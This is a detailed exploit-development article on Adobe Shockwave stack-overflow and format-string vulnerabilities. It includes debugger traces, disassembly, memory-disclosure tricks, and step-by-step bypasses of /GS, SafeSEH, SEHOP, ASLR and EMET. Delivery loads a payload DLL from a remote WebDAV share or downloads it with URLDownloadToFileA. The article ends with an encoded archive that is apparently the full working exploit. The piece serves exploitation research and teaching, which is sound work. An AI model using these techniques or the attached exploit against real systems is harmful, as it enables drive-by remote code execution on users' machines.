When provided with a large enough string as the first parameter to either
of these a buffer on the stack can be overflowed.

In order to craft a large string in Lingo, you can use their equivalent of
a for loop:


  buf = ""
  repeat with i = 0 to 10000
    buf = buf & "$"
  end repeat


Depending on how much data is provided, the fault that the debugger catches
may differ. Here's one such crash:


(63c.410): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=37734236 ebx=02f6bd10 ecx=00000000 edx=03790404 esi=000033a7
edi=02f6c248
eip=6fde9d0a esp=02f6b7ec ebp=02f6b7ec iopl=0       nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b           efl=00210206
IML32!Ordinal1115+0xa:
6fde9d0a 81780454534146  cmp   dword ptr [eax+4],46415354h ds:002b:3773423a


OK, from the faulting instruction alone there is not much to deduce. The
call stack tells us a bit more:


0:005> kv
ChildEBP RetAddr  Args to Child
02f6b7ec 6f2277b8 37734236 02f6b810 6f2283b1 IML32!Ordinal1115+0xa
02f6b7f8 6f2283b1 02f6c248 06cf7024 00000000 DIRAPI+0x377b8
02f6b810 6f23a8ea 06cf7024 000033a7 02f6bd10 DIRAPI+0x383b1
02f6b82c 6f35ec15 06cf7024 02f6c248 02f6bd10 DIRAPI+0x4a8ea
02f6b848 6e73250b 06ced4bc 02f6c248 02f6bd10 DIRAPI+0x16ec15
02f6c114 42346942 69423569 37694236 42386942 Dynamiks+0x335e
02f6c118 69423569 37694236 42386942 6a423969 0x42346942
02f6c11c 37694236 42386942 6a423969 316a4230 0x69423569
02f6c120 42386942 6a423969 316a4230 42326a42 0x37694236
02f6c124 6a423969 316a4230 42326a42 6a42336a 0x42386942
02f6c128 316a4230 42326a42 6a42336a 356a4234 0x6a423969
02f6c12c 42326a42 6a42336a 356a4234 42366a42 0x316a4230
<snip>


The first thing that jumps out here is that there are what appear to be 5
fully intact frames before the stack is smashed. That tells us that the
destination buffer likely originates in the Dynamiks module.

We can also see that there are two stack pointers passed as arguments from
Dynamiks. Inspecting these we can see which was the destination buffer (we
could also deduce this from the frame pointers we see in the call stack...
i.e. it's unlikely to be 0x02f6c248 because the corruption began lower on
the stack):


0:005> dc 02f6c248 L8
02f6c248  73423573 37734236 42387342 74423973 s5Bs6Bs7Bs8Bs9Bt
02f6c258  31744230 42327442 74423374 35744234 0Bt1Bt2Bt3Bt4Bt5
0:005> dc 02f6bd10 L8
02f6bd10  41306141 61413161 33614132 41346141 Aa0Aa1Aa2Aa3Aa4A <- beginning
02f6bd20  61413561 37614136 41386141 62413961 a5Aa6Aa7Aa8Aa9Ab   of our buf


So, the stack buffer begins at 0x02f6bd10 and was passed from the Dynamiks
module into DIRAPI as argument 3. This can be seen by disassembling the
Dynamiks module and checking out the code before offset 0x335e:


(Dynamiks.x32: md5sum c6a9a75deb3da27682c267a7a2507e16, checksum 2a30eb,
Shockwave version 12.0.0.112)

0:005> ub Dynamiks+0x335e L6
Dynamiks+0x334f:
709e334f 8d8dfcfbffff    lea     ecx,[ebp-404h] <- vulnerable buffer
709e3355 51              push    ecx <------------ passed as third argument
709e3356 8d4f08          lea     ecx,[edi+8]
709e3359 51              push    ecx
709e335a 50              push    eax
709e335b ff5244          call    dword ptr [edx+44h]


In a real disassembler (IDA Pro) we can see how large that local variable
is by checking out the function's stack:


-00000404 var_404         db 1024 dup(?)  <--- vuln buffer, 1024 bytes
-00000004 var_4           dd ?
+00000000  s              db 4 dup(?)
+00000004  r              db 4 dup(?)
+00000008 arg_0           dd ?
+0000000C arg_4           dd ?
+00000010 arg_8           dd ?
+00000014 arg_C           dd ?
+00000018 arg_10          dd ?


Any string over 1024 bytes in size will corrupt var_4. Any guess as to what
var_4 is? Yep... say hello to the /GS mitigation:


(Dynamiks.x32: base address 0x10000000)

.text:100018A8                 mov     eax, ___security_cookie
.text:100018AD                 xor     eax, ebp
.text:100018AF                 mov     [ebp+var_4], eax


For those of you not familiar with /GS [12] it is a compiler option that is
on by default in any recent version of Visual Studio. It works by ... well,
skape said it much better than I in his Uninformed [13] article when
describing stack cookie initialization:

"At a high-level, this routine will take an XOR'd combination of the
current system time, process identifier, thread identifier, tick count, and
performance counter. The end result of XOR'ing these values together is
what ends up being the image file's security cookie."

The result of those operations is a 4-byte value that gets generated when
the module is loaded and then stored in its .data section. Any function the
compiler deems in need of some extra protection takes that value and XORs
it again with the current frame pointer (@ebp). It then stores it on the
stack as the first local variable. Upon function exit, the process checks
if it has been tampered with and, if so, throws an exception which usually
results in process termination.

Had we not caused an exception in IML32.dll the code would still return
back to the Dynamiks module and upon function exit (provided it doesn't
access any other invalid data long the way), the stack cookie check would
fail and the process would throw an exception and probably exit. Either
way, this is an obstacle we'll need to bypass.

We'll get back to this in a bit.


----[ 3.3 - Stack-based Memory Disclosure

In the course of testing the 3D Lingo methods, I was using a string
consisting of a large amount of the "%x" characters. I was lucky enough to
also be outputting objects to the Messages window via Lingo's trace()
function. In a few cases I saw some very interesting output, such as the
following:


 model("d03e682631e7c647ae08432631e18680fb8a9d03e6830680276b012d450d03e686
 9080b8e56b7420100c17eb9069056cd56908db3811038")


That was certainly not the name I gave that object when I called
newModel()...

Separating those %x values by spaces yielded:


 model("d03e68 6317e44 5ffad60 43 6317dcc 680fb8a9 d03e68 42 680276b0
 12d450 d03e68 69080b00 5711164 100c 17eb90 69056cd5 6908db38 1 1038")


At this point I was testing all of this on Windows XP and thus there was no
Address Space Layout Randomization to worry about. With that in mind, I'll
tell you that DIRAPI.dll has a preferred base address of 0x68000000 and
IML32.dll of 0x69000000. Looking at the output from the trace() call we can
clearly see that we're dealing with a format string vulnerability and for
each %x we provide, we're returned a 32 bit value off the stack.

As the code path to reach this vulnerability is deterministic, it can be
verified that the code pointers will always be the same on a non-ASLR'd
system. Thus, we can disclose the base addresses of at least two modules as
well as what look to be heap and stack pointers. We can verify the
addresses in a debugger:


0:008> !address 0xd03e68
    00c60000 : 00c60000 - 00101000
                    Type     00020000 MEM_PRIVATE
                    Protect  00000004 PAGE_READWRITE
                    State    00001000 MEM_COMMIT
                    Usage    RegionUsageHeap
                    Handle   00150000
0:008> !heap -p -a 0xd03e68
    address 00d03e68 found in
    _HEAP @ 150000
      HEAP_ENTRY Size Prev Flags    UserPtr UserSize - state
        00c60018 20000 0000  [0b]   00c60020   100000 - (busy VirtualAlloc)
          ? <Unloaded_ame.dll>+ffff7
0:008> !address 6317e44
    06010000 : 06314000 - 0005b000
                    Type     00020000 MEM_PRIVATE
                    Protect  00000004 PAGE_READWRITE
                    State    00001000 MEM_COMMIT
                    Usage    RegionUsageHeap
                    Handle   00150000
0:008> !address 5ffad60
    05f00000 : 05f00000 - 00101000
                    Type     00020000 MEM_PRIVATE
                    Protect  00000004 PAGE_READWRITE
                    State    00001000 MEM_COMMIT
                    Usage    RegionUsageHeap
                    Handle   00150000
0:008> !address 12d450
    00030000 : 0011e000 - 00012000
                    Type     00020000 MEM_PRIVATE
                    Protect  00000004 PAGE_READWRITE
                    State    00001000 MEM_COMMIT
                    Usage    RegionUsageStack
                    Pid.Tid  d1c.89c
0:008> !address 69080b00
    69000000 : 69001000 - 0008c000
                    Type     01000000 MEM_IMAGE
                    Protect  00000020 PAGE_EXECUTE_READ
                    State    00001000 MEM_COMMIT
                    Usage    RegionUsageImage
                    FullPath <snip>IML32.dll
0:008> ub 69056cd5 L1
IML32!Ordinal1754+0x12b3:
69056cd3 ffd5            call    ebp


One thing worth pointing out there is that the heap pointers originate from
an allocation of size 0x100000. This is due to the Smartheap slicing out
allocations from its own arena of that size.

Anyway, the take-away here is that I was able to leak an address from the
stack, two from the heap, and one from a module (IML32.dll).


------[ 3.3.1 - Undocumented Format Specifier

During my initial attempt at exploitation of these issues, I was having
trouble locating a reliable stack pivot within the one module I was able to
leak an address from (IML32.dll). After struggling with that problem for
about one week, I went back and began reverse engineering the root cause of
the memory disclosure and came across some undocumented functionality in
Lingo.

When provided with a "%v" format specifier, the code within DIRAPI.dll
replaces it with <%d %p>:


(DIRAPI.dll: base address 0x68000000,
md5sum fb5405cef8b2d6273c593477392cbc88, checksum 1c266b,
Shockwave version 12.0.0.112)

.text:68039FF2  case__v:
.text:68039FF2
.text:68039FF2    add     edi, 4          ; jumptable 68039EC7 case 35
.text:68039FF5    mov     [ebp+var_814], edi
.text:68039FFB    mov     edi, [edi]
.text:68039FFD    lea     esi, [ebp+var_810]
.text:6803A003    mov     byte ptr [ebp+var_404], 0
.text:6803A00A    call    sub_68039CA0
.text:6803A00F    test    eax, eax
.text:6803A011    jz      loc_6803A0EA
.text:6803A017    mov     eax, [ebp+arg_8]
.text:6803A01A    mov     ecx, [ebp+var_824]
.text:6803A020    mov     edx, [ebp+var_828]
.text:6803A026    push    eax
.text:6803A027    push    ecx
.text:6803A028    push    edi
.text:6803A029    push    edx
.text:6803A02A    call    sub_68030DB0    ; replaces %v with <%d %p> and
.text:6803A02A                              re-enters this func


By placing %v characters at specific locations in the input string I was
able to force a dereference of one of the stack values and retrieve two
32-bit integers from there, which yielded me an additional address within
a module. Specifically, I was able to leak an address within the
"Shockwave 3d Asset.x32" module which, it turned out, had a quite useful
code primitive I abused for a stack pivot.


--[ 4 - Exploit Delivery

The exploits discussed herein were progressively developed, with differing
approaches as obstacles were encountered. I've included explanations of all
of them to allow the reader to gain some insight into the process rather
than just delivering an explanation of what came to be the best solution.
In fact, the attached exploit code has not been "cleaned up", instead it
contains all the artifacts of a work-in-progress leading up to the final
solution.


----[ 4.1 - Server-side Architecture

As some of the exploits have different required architecture, I will cover
all the components I utilized throughout the exploitation process.


------[ 4.1.1 - web.py

I used web.py[14] to serve the following:

  * HTML pages that embedded the .dir files
  * Director files
  * A payload in one of the exploits

The included exploit has the following directory structure:


./
  |   craft_exploit.py
  |   main.py
  |
  |---web
  |       (web.py library code)
  |
  '---www
      |---dirs
      |       input.dir
      |       mem_disc.dir
      |       output.dir
      |
      |---html
      |       exploit.html
      |       index.html
      |
      '---payload
              runcalc.dll


It is also worth noting that I also added code to handle serving
gzip-encoded data to my main.py as I encountered some unreliability with
regard to web.py and its serving of large files.


------[ 4.1.2 - lighttpd

During one stage of the exploit development process, the code required a
WebDAV server to host a payload. For that, I used lighttpd[15] with the
following configuration:


        server.document-root = "/htdocs"
        server.port = 80
        server.username = "nobody"
        server.groupname = "nogroup"

        mimetype.assign = (".html" => "text/html",
                          ".application" => "application/x-ms-application")

        server.modules   = ( "mod_webdav",
                             "mod_alias",
                             "mod_accesslog")

        server.errorlog = "/logs/error.log"
        accesslog.filename = "/logs/access.log"

        webdav.activate = "enable"
        webdav.sqlite-db-name = "/lock/lighttpd.webdav_lock.db"



----[ 4.2 - The HTML

The HTML is pretty basic and consists of an index.html that embeds the .dir
file responsible for memory disclosure and an iframe that is dynamically
populated with the exploit.html page, which in turn embeds the crafted .dir
exploit for that particular client, on demand.

The iframe was required as it was noted that if one was not used, modules
in memory were loaded and unloaded at potentially different addresses if
the browser navigated away from one page, thus rendering the memory
disclosure unreliable.


----[ 4.3 - The Javascript

The index.html page contains the javascript functions responsible for the
following:

  * Receiving disclosed memory contents provided by the mem_disc.dir file
  * Receiving and parsing version, platform, and user agent information
  * POST-ing to itself in order to get such data back to main.py


----[ 4.4 - The Lingo

There are a couple of Lingo functions and properties that are exceptionally
friendly for the exploit developer. The following are used to determine how
to craft the malicious .dir file for a given client and then transport that
information to the server:

  * goToNetPage - function used to call javascript from the .dir
  * environmentPropList - property used to obtain platform, operating
  system information, and shockwave build version


----[ 4.5 - The Python

The craft_exploit.py handles construction of a custom .dir file per client
request. It receives leaked memory addresses, browser user agent, shockwave
version, and platform information from the aforementioned POST request.

The CraftExploit class defined within contains two class variables of note.
The self.int_mods list is populated with tuples containing the file offset
within the template .dir file and the value to inject. For example, the
first stack pivot used corresponds to offset 0x55AFC in the file. The
relevant code that replaces that value in the template .dir file looks like
this:


self.int_mods.append((0x55AFC, self.sw_3d+0x13e522))


The above will cause the resulting .dir file at offset 0x55AFC to contain a
pointer to the "Shockwave 3d Asset.x32" at offset 0x13e522.

The other notable class variable is self.str_mods which does much the same
thing, except that it is implemented as a dictionary. For example, in order
to ensure that a string value will exist at a given offset in the resulting
.dir file, one can utilize str_mods as so:


self.str_mods[0x536D0] = 'urlmon.dll\x00'


The contents of str_mods and int_mods are injected into the file using
CraftExploit's render method and then served to the target client via the
web server.


--[ 5 - Vulnerability Exploitation

The following sections will walk the reader through my exploit development
process against various configurations, bypassing mitigations as
encountered.


----[ 5.1 - Windows XP SP3/Firefox/Shockwave 11.6.5.635

This was the first exploit I wrote for this issue, and as I was developing
it on Windows XP SP3 I did not need to worry about ASLR (or even use the
memory disclosure vulnerability). This was written the day the bug was
discovered with the intent of exploiting the issue quickly, not reliably.

As the vulnerable code is protected by /GS, I opted to overwrite one of the
saved exception handlers on the stack. The executable was also compiled
with SafeSEH, for which bypasses has been covered extensively by others. In
short, I pointed the corrupted handler to an address inside a module that
did not make available the addresses of its exception handling functions
(for WinDBG users, I recommend checking out the narly[16] plugin that helps
determine which addresses are available for such a bypass). Thus, the
exception dispatcher was unable to determine if my corrupted pointer was
legitimate and would proceed to call it.

I then gained stack control and, after some ROP-ing, VirtualProtectEx'd the
stack and returned to it, executing a payload that simply ran
WinExec("calc.exe").

I relied on several things that make this exploit... dirty:

  * The modules I used to ROP with were getting their preferred base
  addresses, and thus I could easily ignore ASLR.
  * I used a system library, shell32.dll, for some primitives. This module
  is updated by Microsoft often and is not something to rely on.

So, to summarize, this exploit bypasses /GS, SafeSEH, DEP, and ignores ASLR
(but is more of a PoC than a proper exploit--and well, it's XP).


----[ 5.2 - Windows XP SP3/Firefox/Shockwave 11.6.8.638

About a day after I wrote the exploit for version 11.6.5.635 Adobe released
11.6.8.638. For completeness' sake, I added support to my exploit for what
was the latest version, using identical primitives, differing just in
location. See the attached exploit for details.


----[ 5.3 - Windows 7 x64/Firefox/Shockwave 12.0.0.112

When Adobe released version 12.0.0.112, I decided to utilize the memory
disclosure bug and exploit the vulnerabilities on a more modern operating
system, Windows 7.

This time, I used the stack memory disclosure to remove any reliance on
indeterminable memory addresses, thus bypassing ASLR. Unlike the prior
exploits, this version simply ROPs to a LoadLibraryA call and requests DLL
over a UNC path. I created a simple DLL that just calls WinExec("calc.exe")
upon load. Then, using lighttpd as described in 4.1.2, the file is served.


----[ 5.4 - Windows 7 x64/Firefox/Shockwave 12.0.0.112/EMET 5.0

The above exploit against Windows 7 x64 uses LoadLibraryA to load a
malicious payload off of a UNC share. EMET removes the ability to do this,
but it is easy enough to bypass, as detailed in the following section.


------[ 5.5.1 - Relevant 'EMET 5.0' Mitigations

The exploit for the same target with EMET 5.0 enabled simply calls
MoveFileA first to move the file from the remote WebDAV to the local
filesystem and then calls LoadLibraryA on the local file.

Protip: chattr +i the DLL file on the server so that the MoveFileA will
move it but won't be able to delete it afterwards, enabling subsequent
exploit attempts to work without a problem. You could also do this within
the lighttpd config.

Also, EMET implements a mitigation they call Export Address Table
Filtering[17] which monitors for read accesses to the exported function
addresses in key system DLL modules. However, the attached exploit
retrieves the addresses of functions by snagging a pointer via the
Shockwave modules' import section (which are not monitored by EMET), rather
than from the system DLL files themselves.


----[ 5.5 - Windows 8 x64/Firefox/Shockwave 12.0.0.112/EMET 5.0

Windows 8 introduces a number of exploit mitigations, thoroughly summarized
by Matt Miller and Ken Johnson during their Blackhat talk in 2012 [18]. The
most obtrusive mitigation that had to be overcome was SEHOP. SEHOP is
another mitigation intended to deter exploitation of SEH-based corruption.
As Microsoft describes [19]:

"The first step involves the insertion of a symbolic exception registration
record as the tail record in a thread's exception handler list. This step
occurs when a thread first begins executing in user mode. Since exception
registration records are always inserted at the head of the exception
handler list, the symbolic record is guaranteed to be the final exception
registration record.

The second step consists of walking the exception handler list at the time
that an exception is being dispatched to ensure that the symbolic record
can be reached and that it is valid. This step happens when the exception
dispatcher is notified that an exception has occurred in user mode. If the
symbolic record cannot be reached, the exception dispatcher can assume that
the exception handler list is corrupt and that an SEH overwrite may have
occurred. The exception dispatcher is then able to safely terminate the
process. If the symbolic record is found, the exception dispatcher is able
to proceed as it normally would and call each of the registered exception
handlers."

In order to bypass this mitigation, you pretty much need a memory
disclosure.  Luckily for me, the leaking of a stack address makes this
possible.

To demonstrate how such a mitigation is bypassed, the following will walk
through inspecting the exception chain before and after the exploit
corrupts it.

Firstly, once attached to the Firefox process, we can tell WinDBG to follow
child processes with the '.childdbg 1' command. Next we point Firefox to
the malicious server which will cause the Shockwave player to be invoked,
thus launching the plugin-container.exe process from Firefox:


0:029> .childdbg 1
Processes created by the current process will be debugged
0:029> g
ModLoad: 70b30000 70b63000   C:\Windows\SysWOW64\shdocvw.dll
<snip>
ModLoad: 09c70000 09c76000   plugin-container.exe
Executable search path is:
ModLoad: 00fa0000 00fa6000   plugin-container.exe
ModLoad: 772f0000 77447000   ntdll.dll
ModLoad: 76620000 76750000   C:\Windows\SysWOW64\KERNEL32.DLL
ModLoad: 74f10000 74fb6000   C:\Windows\SysWOW64\KERNELBASE.dll
<snip>
ModLoad: 74980000 74989000   C:\Windows\SysWOW64\CRYPTBASE.dll
ModLoad: 74920000 74971000   C:\Windows\SysWOW64\bcryptPrimitives.dll
(834.950): Break instruction exception - code 80000003 (first chance)
eax=00000000 ebx=00000003 ecx=a1500000 edx=00000000 esi=00000000
edi=007e0000
eip=77390545 esp=007bf854 ebp=007bf880 iopl=0       nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b           efl=00000246
ntdll!LdrpDoDebuggerBreak+0x2b:
77390545 cc              int     3


In order to inspect the untainted exception chain, we can ask WinDBG to
next break upon loading of the Dynamiks.x32 module using:


1:032> sxe ld:dynamiks
1:032> g
(740.1f0): Unknown exception - code 000006ba (first chance)
ModLoad: 709e0000 70c81000   C:\Users\user\AppData\LocalLow\Adobe\Shockwave
Player 12\xtras\download\AdobeSystemsIncorporated\Dynamiks\Dynamiks.x32
eax=00000000 ebx=00800000 ecx=00000000 edx=00000000 esi=00000000
edi=fe9bf000
eip=77e20fe8 esp=0061a944 ebp=0061a99c iopl=0       nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b           efl=00200206
ntdll!ZwMapViewOfSection+0xc:
77e20fe8 c22800          ret     28h
1:032> bp !Dynamiks+0x335b
1:032> g
Breakpoint 0 hit
eax=0506ba80 ebx=00000000 ecx=0061ca6c edx=71407620 esi=050003a0
edi=0061ca64
eip=709e335b esp=0061c074 ebp=0061c938 iopl=0       nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b           efl=00000246
Dynamiks+0x335b:
709e335b ff5244        call  dword ptr [edx+44h]  ds:002b:71407664=713debe0


We can view the current exception chain with the !exchain command:


1:032> !exchain
0061ef40: USER32!_except_handler4+0 (775f3991)
0061efa4: USER32!_except_handler4+0 (775f3991)
0061f000: ntdll!KiUserCallbackExceptionHandler+0 (77e22e60)
0061f0fc: xul!std::_Mutex::_Mutex+56d (73920859)
0061f858: plugin_container+18f9 (010b18f9)
0061f8a8: ntdll!_except_handler4+0 (77ec35f2)
0061f8c8: ntdll!FinalExceptionHandler+0 (77eb1d86)
Invalid exception stack at ffffffff


For those unfamiliar with the above formatted information, the first number
is the address on the stack of the SEH record. For example, for the first
entry we can inspect the record and verify that the first 32 bit value
points to the next SEH record address on the stack, and that the second 32
bit value points to the code responsible for handling the exception:


1:032> dd 0061ef40 L2
0061ef40  0061efa4 775f3991
1:032> u poi(0061ef40+4) L4
USER32!_except_handler4:
775f3991 8bff            mov     edi,edi
775f3993 55              push    ebp
775f3994 8bec            mov     ebp,esp
775f3996 83ec14          sub     esp,14h


Prior to corruption, the SEH record chain consists of the following stack
locations, terminated by -1:


0061ef40->0061efa4->0061f000->0061f0fc->0061f858->0061f8a8->0061f8c8->
ffffffff


At this point, we also know the address of the destination buffer that will
be overflowed (see section 3.2):


1:032> dd @esp+0x8 L1
0061c07c  0061c534


We can calculate how much data is required to be copied from that address
to reach the first SEH record on the stack:


1:032> ? 0061ef40-0061c534
Evaluate expression: 10764 = 00002a0c


Now comes the fun part. The exception chain validation that occurs when
ntdll!KiUserExceptionDispatcher doesn't care how many entries are in the
chain. What this means is that an attacker has some flexibility with
regard to how they choose to bypass the checks. For example, the stack
corruption could be used to link the first exception handler
(USER32!_except_handler4) all the way to the last one
(ntdll!FinalExceptionHandler) by modifying the first's *next pointer.
Another option (and the one that I chose) is to craft a fake SEH record,
link a prior record to yours, and link yours to an existing one located
further down the stack. To illustrate this, the below shows the state of
the exception chain after attempting to step over the call that causes the
stack-based buffer overflow:


1:032> p
(740.1f0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=37734236 ebx=0061c534 ecx=00000000 edx=00e5eff4 esi=00002af8
edi=0061ca6c
eip=71439d0a esp=0061c010 ebp=0061c010 iopl=0       nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b           efl=00010206
IML32!Ordinal1115+0xa:
71439d0a 81780454534146 cmp dword ptr [eax+4],46415354h ds:002b:3773423a=??
1:032> !exchain
0061ef40: Shockwave_3d_Asset!CIFXString::SetCodePage+49122 (70f2e522)
0061ef50: 41414141
0061f0fc: xul!std::_Mutex::_Mutex+56d (73920859)
0061f858: plugin_container+18f9 (010b18f9)
0061f8a8: ntdll!_except_handler4+0 (77ec35f2)
0061f8c8: ntdll!FinalExceptionHandler+0 (77eb1d86)
Invalid exception stack at ffffffff


Note that now the SEH chain consists of:


0061ef40->0061ef50->0061f0fc->0061f858->0061f8a8->0061f8c8->ffffffff


What has occured is the first SEH record has been corrupted to point into
the "Shockwave 3d Asset.x32" module (this is our stack pivot--more on this
later) and it's *next pointer has been modified to point to a new address
on the stack (calculated using the stack memory disclosure).

The second record shown above is a fake one that my exploit crafts to
re-link the chain. Its *next pointer has been crafted to point to 0061f0fc
which is a valid SEH record that existed prior to the corruption. Note that
its code pointer was simply set to 0x41414141, which is weakly validated by
ntdll's exception dispatcher to ensure it is not located on the stack.

At this stage, the SEH chain will pass SEHOP validation and the first
record's code will be called. This can be verified in the debugger:


1:032> bp Shockwave_3d_Asset!CIFXString::SetCodePage+49122
1:032> g
Breakpoint 1 hit
eax=00000000 ebx=00000000 ecx=70f2e522 edx=77e23105 esi=00000000
edi=00000000
eip=70f2e522 esp=0061ba5c ebp=0061ba7c iopl=0       nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b           efl=00000246
Shockwave_3d_Asset!CIFXString::SetCodePage+0x49122:
70f2e522 8b4d0c     mov   ecx,dword ptr [ebp+0Ch] ss:002b:0061ba88=0061ef40



------[ 5.5.1 - Relevant 'EMET 5.0 Tech Preview' Mitigations

EMET 5.0 implements many mitigations that were submitted as 'defensive
security research' to the Microsoft BlueHat Prize Contest (over $250,000
was awarded). The software is still in Tech Preview, but I was curious as
to how difficult it would be to bypass. I was also a bit irked that my
prior exploits required a WebDAV server. So, in this version of the exploit
I decided to remove that requirement. This was accomplished by ROP-ing a
call to LoadLibraryA whereby I loaded the urlmon.dll module. More
specifically, I returned to LoadLibraryA+0x5 to skip over the EMET hook:


1:039> u KERNEL32!LoadLibraryA L2
KERNEL32!LoadLibraryA:
76ccf864 e92f0932f9      jmp     6fff0198
76ccf869 837d0800        cmp     dword ptr [ebp+8],0

1:039> u 6fff0198
6fff0198 684bedeeeb      push    0EBEEED4Bh
6fff019d 60              pushad
6fff019e 9c              pushfd
6fff019f 54              push    esp
6fff01a0 e80bd32a05      call    emet+0x4d4b0 (7529d4b0)
6fff01a5 9d              popfd
6fff01a6 61              popad
6fff01a7 83c404          add     esp,4


By ensuring we land at LoadLibraryA+0x5 and we control @ebp, this EMET hook
is trivially bypassed. Microsoft is aware of how limited this hook is, and
they even cite Phrack in their blog post[20].

Once urlmon.dll was loaded, I had to deal with EMET's 'Caller' mitigation,
which does the following:

"EMET will make sure that when a critical function is reached, it is
reached via a "call" instruction rather than a "ret" instruction. This is a
very useful mitigation and breaks many ROP gadgets."[20]

I also had to deal with the 'SimExecFlow' mitigation:

"This mitigation tries to detect ROP gadgets following a call to a critical
function. It works by emulating a specified number of instructions at the
return address of the caller of a critical function."[20]

Both of the above mitigations would interfere with my calling
GetProcAddress to retrieve the address of URLDownloadToFileA. They were
bypassed by returning into the middle of a module's existing call to
GetProcAddress, thus EMET could not tell that it was ROP-ed to or that it
was an illegitimate call:


.text:7A25CD4A 00C                 push    eax             ; hModule
.text:7A25CD4B 010                 call    ds:GetProcAddress
.text:7A25CD51 008                 mov     [esi+18h], eax
.text:7A25CD54 008                 cmp     eax, edi
.text:7A25CD56 008                 jnz     short loc_7A25CD6D
.text:7A25CD6D     loc_7A25CD6D:
.text:7A25CD6D
.text:7A25CD6D 008                 mov     eax, edi
.text:7A25CD6F 008                 pop     edi
.text:7A25CD70 004                 pop     esi
.text:7A25CD71 000                 retn
.text:7A25CD71     sub_7A25CD20    endp


By returning directly to the code at 0x7A25CD4A, @eax already contained the
result from LoadLibraryA("urlmon.dll\x00"), and because I could predict
stack addresses using the memory leak it was easy enough to ensure there
was a pointer to the string "URLDownloadToFileA\x00" for the call to
GetProcAddress and also that @esi was pointing to a stack address under
control. Thus, I was able to get the address of the function without a
problem.

Then, I called URLDownloadToFileA to drop the payload to a default writable
local directory (C:\Users\Public) and then returned to LoadLibraryA and
loaded the code.


--[ 6 - Future Work

I began developing support for process continuation/continuation of
execution/whatever it's being called these days. It should be fairly easy
to ensure the plugin-container.exe doesn't crash hard, but would require
reversing the interaction between this process and the firefox.exe parent.


--[ 7 - Conclusion

This article wasn't intended to share anything novel... any competent
exploit writer could have implemented the attached exploit. I just wanted
to share a walkthrough from bug discovery to reliable exploit so that
readers can get a feel for what the process is like these days.


--[ 8 - Greets

Thanks to navs, sohlow, raid, & hoodlum for their insight and valuable
discussions.


--[ 9 - References

[1] http://community.corest.com/~gera/InsecureProgramming
[2] http://virus.wikia.com/wiki/29A
[3] http://www.uninformed.org
[4] http://helpx.adobe.com/shockwave/kb/shockwave-player-faq.html
[5] http://www.adobe.com/products/shockwaveplayer.html
[6] https://wiki.mozilla.org/NPAPI
[7] http://www.adobe.com/products/director.html
[8] http://cansecwest.com/csw11/Adobe_Shockwave-AaronPortnoy
    _LoganBrown.pptx
[9] http://www.microquill.com/smartheap/index.html
[10] http://www.j4u2.com/jht/bio.html
[11] http://helpx.adobe.com/director/topics/scripting-dictionary.html
[12] http://msdn.microsoft.com/en-us/library/8dbf701c(v=vs.80).aspx
[13] http://uninformed.org/index.cgi?v=7&a=2&p=5
[14] http://webpy.org/
[15] http://www.lighttpd.net/
[16] https://code.google.com/p/narly/
[17] http://blogs.technet.com/b/srd/archive/2009/02/02/preventing-the-
     exploitation-of-seh-overwrites-with-sehop.aspx
[18] http://media.blackhat.com/bh-us-12/Briefings/M_Miller/BH_US_12_Miller
     _Exploit_Mitigation_Slides.pdf
[19] http://blogs.technet.com/b/srd/archive/2010/07/28/announcing-the-
     upcoming-release-of-emet-v2.aspx
[20] http://blogs.technet.com/b/srd/archive/2012/07/24/emet-3-5-tech-
     preview-leverages-security-mitigations-from-the-bluehat-prize.aspx


--[ 10 - Exploit

begin 644 exploit.tar.bz2
M0EIH.3%!629364!,H#H!S([_____________________________________
M________Y!X>0)?:S2"*D4A6M39E$IL:UJ*BE%4DV95K%5(I0*%*`"JM@`U4
M@6QED:4$@`4"J`````H````````T`````"@`4``````!8`WON`'"````````
M```````````````````````2```````````````````````5D!$`!H`#T```
M%F`%``````.AHRP`````````"TT:0`+:95L*MK`P8``````````P`'KKYYR7
M6,88`````````-Z=`\L\JF;&Q@`````````6/2'O#T\3$````WI4O>AXR=,&
MUZ!5ZN'D],8>A/#P.CQGH*$\>'H1N>45#/`.\Y[JH)JKP>@"-SQ1%-7@#P]W
MM*@@8\!>7'JJ[,#I<'D3[:@GWOLJI0`QX#SW>`8J`:3P'C</*BB0`&\#GMSP
M\HD`J`PX'>./`Y2)%4H8>"[V/`'4E2`U'@WCF`\I44`QX+R.`>2I"F/#><8#
MU*C4KP7D<!ZH&D>%X3@/5`&'A>VX#U:RC#@\PX/54#4>%[6<!ZE(&B>%Y.H>
MDI24#'A>N*/*I2*4,>+V9P`\52&HX>8X!Z*H&>#O:$YX>D\OL]N><NS[Z2@B
M*<B@!0%``6.[9Z(?0&<+V9RKK[F?9A\"^V.`$8<QP`C@1E`6"#`1@C'I1N'K
M#@)@=,</1N'K#AZS@@P+![;9QZ9X/6T[V[.YXO,SGE7'J1>.7EX#UM'*5<^`
M`````````!/=H^^KU`#SX``````````(:?&>JI6.>``!$```````G7'G0W'@
M`4``4``````@QP3<``*````````GIWJ*W@``````````1WI[XWGP````````
M``0;SS<\``*``H`````)\N/%W/``$(```````0.?+ZYX````%`````"/E'/$
M;@4W+2'3.K:``$<'T%<Y````````HJ@````````:``8H@``````9&]LRP#K'
M/6=\`````3Y<>$\`````<>CGA,]Z`````,Q.>^L/@``'T`'P#O$;@)```"/0
MX*N`"@22`1J/)N`!0``1ZZO)O`````@,=&Y0```0.';E```*CTX\MX```"'M
MND]5GEY(R`&@3(\/-Q>4*!H`8#GHS@`"@!!@,```,]4\^OG?```!`;B.```.
M?$=Y'AT``"!NE5P'0``CTYZ4\'H``'ASU5<```.>AWJ+P```=Y.]]L7P#X@`
M'QH<\"\``'H/#O`N```'!N!<``<&XI&>F<(PC"86"P,88$Q,Y7M````N>>'N
M8-"@\5J```!<#K941<```!.<^6[UUMA`V@```1Q[WKO+MIW(`+0```)ES5U[
